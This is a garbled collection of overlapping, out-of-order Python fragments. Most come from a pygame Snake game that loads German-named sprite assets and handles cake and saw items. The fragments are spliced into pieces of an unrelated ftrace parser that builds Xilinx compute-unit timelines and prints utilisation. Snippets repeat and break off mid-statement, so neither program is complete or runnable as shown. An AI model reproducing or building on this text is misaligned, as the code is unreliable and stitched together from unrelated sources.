Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else: Cake.remove_cake()", "= pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_oben.png')", "body_copy[0] + self.direction) self.body = body_copy[:] else: self.new_block = 
False body_copy = self.body[:CUTTING]", "self.tail = self.tail_right elif tail_relation == Vector2(0,-1): self.tail = self.tail_up elif tail_relation ==", "from .eatable.saw import Saw from .eatable.cake import Cake class Snake(object): is_moving = False", "previous_block.y == -1 and next_block.x == -1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x == -1", "next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x == 1 and next_block.y == 1", "# Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_oben.png') self.body_br = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_unten.png') self.body_bl =", "body_copy = self.body[:] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] if Cake.eated_the_cake(): if", "is tha face if index == 0: self.pyScreen.blit(self.head,block_rect) elif index == len(self.body) -", "False def __init__(self, screen: pygame.Surface) -> None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen =", "self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x == -1 and next_block.y == -1 or previous_block.y", "== Vector2(0,-1): self.head = self.head_up elif head_relation == Vector2(0,1): self.head = self.head_down def", "pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right", "self.body[1] - self.body[0] if head_relation == Vector2(-1,0): self.head = self.head_left elif head_relation ==", "if head_relation == Vector2(-1,0): self.head = self.head_left elif head_relation == Vector2(1,0): self.head =", "- self.body[-1] if tail_relation 
== Vector2(-1,0): self.tail = self.tail_left elif tail_relation == Vector2(1,0):", "self.body[-1] if tail_relation == Vector2(-1,0): self.tail = self.tail_left elif tail_relation == Vector2(1,0): self.tail", "self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal =", "cell_size) block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size) # what direction is tha face", "def __init__(self, screen: pygame.Surface) -> None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen", "set_direction(self, vec) -> pygame.Surface: #Snake.is_moving = True self.direction = vec def add_block(self) ->", "else: self.new_block = False else: body_copy = self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction) self.body", "import Vector2 from .config import FPS, xSize, ySize, cell_size, cell_number, CUTTING from .eatable.saw", "= screen self.direction = Vector2(1,0) self.new_block = False self.slowed = False def draw_snake_object(self)", "(abs(CUTTING)+1): if self.new_block == True: body_copy = self.body[:] body_copy.insert(0, body_copy[0] + self.direction) self.body", "load_snake_texture(self) -> pygame.Surface: # Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left =", ".eatable.saw import Saw from .eatable.cake import Cake class Snake(object): is_moving = False def", "body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] else: self.new_block = False body_copy =", "self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface: tail_relation = self.body[-2] - self.body[-1] if tail_relation", "self.slowed = False def 
draw_snake_object(self) -> None: for index, block in enumerate(self.body): #", "= False def __init__(self, screen: pygame.Surface) -> None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen", "None: self.new_block = True def load_snake_texture(self) -> pygame.Surface: # Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png')", "import Saw from .eatable.cake import Cake class Snake(object): is_moving = False def __init__(self,", "Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface: tail_relation = self.body[-2] -", "Vector2(1,0): self.head = self.head_right elif head_relation == Vector2(0,-1): self.head = self.head_up elif head_relation", "head_relation == Vector2(0,1): self.head = self.head_down def move_snake(self) -> None: if Saw.get_cutted() ==", "False else: self.new_block = False else: body_copy = self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction)", "def add_block(self) -> None: self.new_block = True def load_snake_texture(self) -> pygame.Surface: # Kopf", "= False def draw_snake_object(self) -> None: for index, block in enumerate(self.body): # rect", "block_rect) elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x == -1 and", "pygame.Surface: #Snake.is_moving = True self.direction = vec def add_block(self) -> None: self.new_block =", "self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up =", "self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction = Vector2(1,0) self.new_block = False self.slowed", "self.body[:] body_copy.insert(0, body_copy[0] + self.direction) self.body = 
body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown() !=", "== -1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x == 1 and next_block.y == -1 or", "= pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png')", "else: previous_block = self.body[index + 1] - block next_block = self.body[index - 1]", "rect for positioning x_pos = int(block.x * cell_size) y_pos = int(block.y * cell_size)", "if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else:", "+ 1] - block next_block = self.body[index - 1] - block if previous_block.x", "-1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x == -1 and next_block.y == 1 or previous_block.y", "elif head_relation == Vector2(0,1): self.head = self.head_down def move_snake(self) -> None: if Saw.get_cutted()", "else: if previous_block.x == -1 and next_block.y == -1 or previous_block.y == -1", "pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr =", "self.head = self.head_left elif head_relation == Vector2(1,0): self.head = self.head_right elif head_relation ==", "or len(self.body) < (abs(CUTTING)+1): if self.new_block == True: body_copy = self.body[:] body_copy.insert(0, body_copy[0]", "== -1 and next_block.y == 1 or previous_block.y == 1 and next_block.x ==", "== Vector2(0,1): self.head = self.head_down def move_snake(self) -> None: if Saw.get_cutted() == False", "self.body[-2] - self.body[-1] if 
tail_relation == Vector2(-1,0): self.tail = self.tail_left elif tail_relation ==", "Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png')", "= self.tail_right elif tail_relation == Vector2(0,-1): self.tail = self.tail_up elif tail_relation == Vector2(0,1):", "def load_snake_texture(self) -> pygame.Surface: # Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left", "False else: body_copy = self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] else:", "= self.body[-2] - self.body[-1] if tail_relation == Vector2(-1,0): self.tail = self.tail_left elif tail_relation", "= self.body[index + 1] - block next_block = self.body[index - 1] - block", "self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x == -1 and next_block.y == 1 or previous_block.y ==", "block_rect) else: if previous_block.x == -1 and next_block.y == -1 or previous_block.y ==", "= body_copy[:] else: self.new_block = False body_copy = self.body[:CUTTING] body_copy.insert(0, body_copy[0] + self.direction)", "# Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png')", "= self.head_up elif head_relation == Vector2(0,1): self.head = self.head_down def move_snake(self) -> None:", "Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions 
self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl", "self.tail_left elif tail_relation == Vector2(1,0): self.tail = self.tail_right elif tail_relation == Vector2(0,-1): self.tail", "self.body[index + 1] - block next_block = self.body[index - 1] - block if", "- block next_block = self.body[index - 1] - block if previous_block.x == next_block.x:", "== 1 and next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x == 1 and", "for index, block in enumerate(self.body): # rect for positioning x_pos = int(block.x *", "= self.tail_up elif tail_relation == Vector2(0,1): self.tail = self.tail_down def update_head_graphics(self) -> pygame.Surface:", "= self.body[:] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown()", "pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left", "True: body_copy = self.body[:] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] if Cake.eated_the_cake():", "self.head_right elif head_relation == Vector2(0,-1): self.head = self.head_up elif head_relation == Vector2(0,1): self.head", "previous_block = self.body[index + 1] - block next_block = self.body[index - 1] -", "# Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left =", "1] - block if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y == next_block.y:", "# what direction is tha face if 
index == 0: self.pyScreen.blit(self.head,block_rect) elif index", "# rect for positioning x_pos = int(block.x * cell_size) y_pos = int(block.y *", "Saw.get_cutted() == False or len(self.body) < (abs(CUTTING)+1): if self.new_block == True: body_copy =", "= True def load_snake_texture(self) -> pygame.Surface: # Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right =", "= pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png') self.tail_left = pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper", "next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x == -1 and next_block.y == -1 or", "== Vector2(1,0): self.head = self.head_right elif head_relation == Vector2(0,-1): self.head = self.head_up elif", "update_head_graphics(self) -> pygame.Surface: head_relation = self.body[1] - self.body[0] if head_relation == Vector2(-1,0): self.head", "def draw_snake(self) -> None: # Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) ->", "tail_relation == Vector2(1,0): self.tail = self.tail_right elif tail_relation == Vector2(0,-1): self.tail = self.tail_up", "head_relation == Vector2(0,-1): self.head = self.head_up elif head_relation == Vector2(0,1): self.head = self.head_down", "== -1 and next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x == 1 and", "- block if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal,", "self.head = self.head_right elif head_relation == Vector2(0,-1): self.head = self.head_up elif head_relation ==", "pygame.image.load('assets/Schlange/Schlange_vertikal.png') 
self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_oben.png') self.body_br", "True self.direction = vec def add_block(self) -> None: self.new_block = True def load_snake_texture(self)", "self.head = self.head_down def move_snake(self) -> None: if Saw.get_cutted() == False or len(self.body)", "int(block.y * cell_size) block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size) # what direction is", "-1 and next_block.x == -1: self.pyScreen.blit(self.body_tl, block_rect) elif previous_block.x == -1 and next_block.y", "and next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x == 1 and next_block.y ==", "self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr = pygame.image.load('assets/Schlange/Schlange_Ecke_rechts_oben.png') self.body_tl = pygame.image.load('assets/Schlange/Schlange_Ecke_links_oben.png') self.body_br =", "previous_block.x == -1 and next_block.y == 1 or previous_block.y == 1 and next_block.x", "* cell_size) block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size) # what direction is tha", "and next_block.y == -1 or previous_block.y == -1 and next_block.x == 1: self.pyScreen.blit(self.body_tr,", "self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x == 1 and next_block.y == 1 or previous_block.y ==", "direction is tha face if index == 0: self.pyScreen.blit(self.head,block_rect) elif index == len(self.body)", "self.tail_down def update_head_graphics(self) -> pygame.Surface: head_relation = self.body[1] - self.body[0] if head_relation ==", "block in enumerate(self.body): # rect for positioning x_pos = int(block.x * cell_size) y_pos", "self.new_block == True: body_copy = self.body[:] body_copy.insert(0, body_copy[0] + self.direction) self.body = 
body_copy[:]", "enumerate(self.body): # rect for positioning x_pos = int(block.x * cell_size) y_pos = int(block.y", "== -1 and next_block.y == -1 or previous_block.y == -1 and next_block.x ==", "Vector2(0,1): self.tail = self.tail_down def update_head_graphics(self) -> pygame.Surface: head_relation = self.body[1] - self.body[0]", "self.pyScreen.blit(self.head,block_rect) elif index == len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index +", "self.new_block = True def load_snake_texture(self) -> pygame.Surface: # Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right", "-> None: for index, block in enumerate(self.body): # rect for positioning x_pos =", "== 1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x == 1 and next_block.y == 1 or", "Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block = False else: self.new_block", "block_rect) elif previous_block.x == 1 and next_block.y == -1 or previous_block.y == -1", "= False else: self.new_block = False else: body_copy = self.body[:-1] body_copy.insert(0, body_copy[0] +", "previous_block.y == 1 and next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) -> None:", "tail_relation == Vector2(0,1): self.tail = self.tail_down def update_head_graphics(self) -> pygame.Surface: head_relation = self.body[1]", "body_copy[0] + self.direction) self.body = body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown()", "= True self.direction = vec def add_block(self) -> None: self.new_block = True def", "self.body = body_copy[:] Saw.cutting_done() Snake.is_moving = False def set_direction(self, vec) -> pygame.Surface: #Snake.is_moving", "self.direction) self.body = body_copy[:] Saw.cutting_done() Snake.is_moving = False def set_direction(self, vec) -> pygame.Surface:", "= body_copy[:] 
Saw.cutting_done() Snake.is_moving = False def set_direction(self, vec) -> pygame.Surface: #Snake.is_moving =", "y_pos = int(block.y * cell_size) block_rect = pygame.Rect(x_pos, y_pos, cell_size, cell_size) # what", "= self.tail_left elif tail_relation == Vector2(1,0): self.tail = self.tail_right elif tail_relation == Vector2(0,-1):", "block_rect) elif previous_block.x == -1 and next_block.y == 1 or previous_block.y == 1", "next_block.y == -1 or previous_block.y == -1 and next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect)", "self.new_block = False else: self.new_block = False else: body_copy = self.body[:-1] body_copy.insert(0, body_copy[0]", "-> pygame.Surface: # Kopf self.head_up = pygame.image.load('assets/Schlange/Schlange_Kopf_oben.png') self.head_right = pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png')", "tha face if index == 0: self.pyScreen.blit(self.head,block_rect) elif index == len(self.body) - 1:", "self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y == next_block.y: self.pyScreen.blit(self.body_horizontal, block_rect) else: if previous_block.x == -1", "elif head_relation == Vector2(0,-1): self.head = self.head_up elif head_relation == Vector2(0,1): self.head =", "= pygame.image.load('assets/Schlange/Schlange_Kopf_rechts.png') self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png')", "self.body = body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block", "__init__(self, screen: pygame.Surface) -> None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)] self.pyScreen = screen self.direction", "def update_head_graphics(self) -> 
pygame.Surface: head_relation = self.body[1] - self.body[0] if head_relation == Vector2(-1,0):", "1 or previous_block.y == 1 and next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self)", "else: body_copy = self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] else: self.new_block", "== 1 and next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect) def draw_snake(self) -> None: #", "- 1] - block if previous_block.x == next_block.x: self.pyScreen.blit(self.body_vertical, block_rect) elif previous_block.y ==", ".config import FPS, xSize, ySize, cell_size, cell_number, CUTTING from .eatable.saw import Saw from", "next_block.y == 1 or previous_block.y == 1 and next_block.x == 1: self.pyScreen.blit(self.body_br, block_rect)", "or previous_block.y == 1 and next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x ==", "if previous_block.x == -1 and next_block.y == -1 or previous_block.y == -1 and", "== -1 or previous_block.y == -1 and next_block.x == 1: self.pyScreen.blit(self.body_tr, block_rect) elif", "block_rect) def draw_snake(self) -> None: # Update Snake-Model self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self)", "== Vector2(1,0): self.tail = self.tail_right elif tail_relation == Vector2(0,-1): self.tail = self.tail_up elif", ".eatable.cake import Cake class Snake(object): is_moving = False def __init__(self, screen: pygame.Surface) ->", "False self.slowed = False def draw_snake_object(self) -> None: for index, block in enumerate(self.body):", "and next_block.y == -1 or previous_block.y == -1 and next_block.x == -1: self.pyScreen.blit(self.body_tl,", "1: self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index + 1] - block next_block = self.body[index", "next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect) elif previous_block.x == 1 and next_block.y == -1", 
"add_block(self) -> None: self.new_block = True def load_snake_texture(self) -> pygame.Surface: # Kopf self.head_up", "- 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index + 1] - block next_block =", "self.tail = self.tail_left elif tail_relation == Vector2(1,0): self.tail = self.tail_right elif tail_relation ==", "== -1 or previous_block.y == -1 and next_block.x == -1: self.pyScreen.blit(self.body_tl, block_rect) elif", "head_relation = self.body[1] - self.body[0] if head_relation == Vector2(-1,0): self.head = self.head_left elif", "elif previous_block.x == 1 and next_block.y == 1 or previous_block.y == 1 and", "== len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect) else: previous_block = self.body[index + 1] - block", "FPS, xSize, ySize, cell_size, cell_number, CUTTING from .eatable.saw import Saw from .eatable.cake import", "+ self.direction) self.body = body_copy[:] if Cake.eated_the_cake(): if Cake.get_cake_countdown() != 0: Cake.decrase_cake_countdown() else:", "vec def add_block(self) -> None: self.new_block = True def load_snake_texture(self) -> pygame.Surface: #", "= pygame.Rect(x_pos, y_pos, cell_size, cell_size) # what direction is tha face if index", "!= 0: Cake.decrase_cake_countdown() else: Cake.remove_cake() self.new_block = False else: self.new_block = False else:", "Saw from .eatable.cake import Cake class Snake(object): is_moving = False def __init__(self, screen:", "elif previous_block.x == 1 and next_block.y == -1 or previous_block.y == -1 and", "self.head_down def move_snake(self) -> None: if Saw.get_cutted() == False or len(self.body) < (abs(CUTTING)+1):", "Snake(object): is_moving = False def __init__(self, screen: pygame.Surface) -> None: self.load_snake_texture() self.body =", "1: self.pyScreen.blit(self.body_tr, block_rect) elif previous_block.x == 1 and next_block.y == 1 or previous_block.y", "= self.body[:-1] body_copy.insert(0, body_copy[0] + self.direction) self.body = body_copy[:] else: 
self.new_block = False", "previous_block.x == 1 and next_block.y == 1 or previous_block.y == 1 and next_block.x", "self.head_left = pygame.image.load('assets/Schlange/Schlange_Kopf_links.png') self.head_down = pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down =", "= pygame.image.load('assets/Schlange/Schlange_Schwanz_links.png') # Körper self.body_vertical = pygame.image.load('assets/Schlange/Schlange_vertikal.png') self.body_horizontal = pygame.image.load('assets/Schlange/Schlange_horizontal.png') # Directions self.body_tr", "face if index == 0: self.pyScreen.blit(self.head,block_rect) elif index == len(self.body) - 1: self.pyScreen.blit(self.tail,block_rect)", "= pygame.image.load('assets/Schlange/Schlange_Kopf_unten.png') # Schwanz self.tail_up = pygame.image.load('assets/Schlange/Schlange_Schwanz_oben.png') self.tail_down = pygame.image.load('assets/Schlange/Schlange_Schwanz_unten.png') self.tail_right = pygame.image.load('assets/Schlange/Schlange_Schwanz_rechts.png')", "-> pygame.Surface: head_relation = self.body[1] - self.body[0] if head_relation == Vector2(-1,0): self.head =", "-> None: self.new_block = True def load_snake_texture(self) -> pygame.Surface: # Kopf self.head_up =", "is_moving = False def __init__(self, screen: pygame.Surface) -> None: self.load_snake_texture() self.body = [Vector2(5,10),Vector2(4,10),Vector2(3,10)]", "next_block.y == 1 or previous_block.y == 1 and next_block.x == -1: self.pyScreen.blit(self.body_bl, block_rect)", "pygame.Surface: tail_relation = self.body[-2] - self.body[-1] if tail_relation == Vector2(-1,0): self.tail = self.tail_left", "self.update_head_graphics() self.update_tail_graphics() self.draw_snake_object() def update_tail_graphics(self) -> pygame.Surface: tail_relation = self.body[-2] - self.body[-1] if", "elif tail_relation == Vector2(0,1): self.tail = self.tail_down def update_head_graphics(self) -> 
pygame.Surface: head_relation =" ]
[ "list. If this menu has already been notified, it will' \\ 'skip sending.'", "Command(BaseCommand): help = 'Sends today\\'s menu to lunch-bot mailing list. If this menu", "= 'Sends today\\'s menu to lunch-bot mailing list. If this menu has already", "send_menu_email class Command(BaseCommand): help = 'Sends today\\'s menu to lunch-bot mailing list. If", "BaseCommand from util.mailer import send_menu_email class Command(BaseCommand): help = 'Sends today\\'s menu to", "from util.mailer import send_menu_email class Command(BaseCommand): help = 'Sends today\\'s menu to lunch-bot", "'Sends today\\'s menu to lunch-bot mailing list. If this menu has already been", "mailing list. If this menu has already been notified, it will' \\ 'skip", "help = 'Sends today\\'s menu to lunch-bot mailing list. If this menu has", "this menu has already been notified, it will' \\ 'skip sending.' def handle(self,", "import BaseCommand from util.mailer import send_menu_email class Command(BaseCommand): help = 'Sends today\\'s menu", "lunch-bot mailing list. If this menu has already been notified, it will' \\", "django.core.management.base import BaseCommand from util.mailer import send_menu_email class Command(BaseCommand): help = 'Sends today\\'s", "today\\'s menu to lunch-bot mailing list. If this menu has already been notified,", "If this menu has already been notified, it will' \\ 'skip sending.' def", "to lunch-bot mailing list. If this menu has already been notified, it will'", "from django.core.management.base import BaseCommand from util.mailer import send_menu_email class Command(BaseCommand): help = 'Sends", "util.mailer import send_menu_email class Command(BaseCommand): help = 'Sends today\\'s menu to lunch-bot mailing", "menu has already been notified, it will' \\ 'skip sending.' 
def handle(self, *args,", "import send_menu_email class Command(BaseCommand): help = 'Sends today\\'s menu to lunch-bot mailing list.", "class Command(BaseCommand): help = 'Sends today\\'s menu to lunch-bot mailing list. If this", "<filename>menu/management/commands/send_notification.py from django.core.management.base import BaseCommand from util.mailer import send_menu_email class Command(BaseCommand): help =", "already been notified, it will' \\ 'skip sending.' def handle(self, *args, **options): send_menu_email()", "has already been notified, it will' \\ 'skip sending.' def handle(self, *args, **options):", "menu to lunch-bot mailing list. If this menu has already been notified, it" ]
[ "writing, software # distributed under the License is distributed on an \"AS IS\"", "continue cuRetData[core] = [] runT = 0 start = 0 for e in", "'cu_done': if start == 0: continue # prefix, i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\",", "License. import parser.parserBase import parser.ftraceUtil CUs = [] class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge')", "continue print(\"##### Util of %s: %.2f\" % (core, runT * 100 / totalT))", "KIND, either express or implied. # See the License for the specific language", "import parser.parserBase import parser.ftraceUtil CUs = [] class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def", "Unless required by applicable law or agreed to in writing, software # distributed", "core in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT == 0: continue", "# See the License for the specific language governing permissions and # limitations", "the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "[] runT = 0 start = 0 for e in cuEvents[core]: eventType =", "under the License. 
import parser.parserBase import parser.ftraceUtil CUs = [] class cuEdgeParser(parser.parserBase.Parser): def", "cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT == 0: continue cuRetData[core] =", "0 for e in cuEvents[core]: eventType = e.func if eventType == 'cu_start': start", "totalT == 0: continue cuRetData[core] = [] runT = 0 start = 0", "a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable", "\"TIMELINE-CU_%s\" % hex(idx) if coreID not in cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return", "# prefix, i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"]) runT +=", "law or agreed to in writing, software # distributed under the License is", "of %s: %.2f\" % (core, runT * 100 / totalT)) return cuRetData parser.parserBase.register(cuEdgeParser())", "if start == 0: continue # prefix, i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88,", "the License for the specific language governing permissions and # limitations under the", "compliance with the License. # You may obtain a copy of the License", "{} for l in data: event = parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx'] coreID", "# limitations under the License. import parser.parserBase import parser.ftraceUtil CUs = [] class", "= parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" % hex(idx) if coreID", "Util of %s: %.2f\" % (core, runT * 100 / totalT)) return cuRetData", "and # limitations under the License. import parser.parserBase import parser.ftraceUtil CUs = []", "language governing permissions and # limitations under the License. 
import parser.parserBase import parser.ftraceUtil", "== 'cu_start': start = e.timeStamp elif eventType == 'cu_done': if start == 0:", "parse(self, data, options): #cuMap = options['cuMap'] cuEvents = {} cuRetData = {} for", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "CUs = [] class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def parse(self, data, options): #cuMap", "elif eventType == 'cu_done': if start == 0: continue # prefix, i.pid, i.startTime,", "this file except in compliance with the License. # You may obtain a", "= 0 start = 0 for e in cuEvents[core]: eventType = e.func if", "the Apache License, Version 2.0 (the \"License\"); # you may not use this", "the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed", "you may not use this file except in compliance with the License. #", "for the specific language governing permissions and # limitations under the License. import", "= [] class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def parse(self, data, options): #cuMap =", "= e.func if eventType == 'cu_start': start = e.timeStamp elif eventType == 'cu_done':", "if eventType == 'cu_start': start = e.timeStamp elif eventType == 'cu_done': if start", "hex(idx) if coreID not in cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st,", "the License. import parser.parserBase import parser.ftraceUtil CUs = [] class cuEdgeParser(parser.parserBase.Parser): def __init__(self):", "http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software", "2019 Xilinx Inc. # Licensed under the Apache License, Version 2.0 (the \"License\");", "the specific language governing permissions and # limitations under the License. 
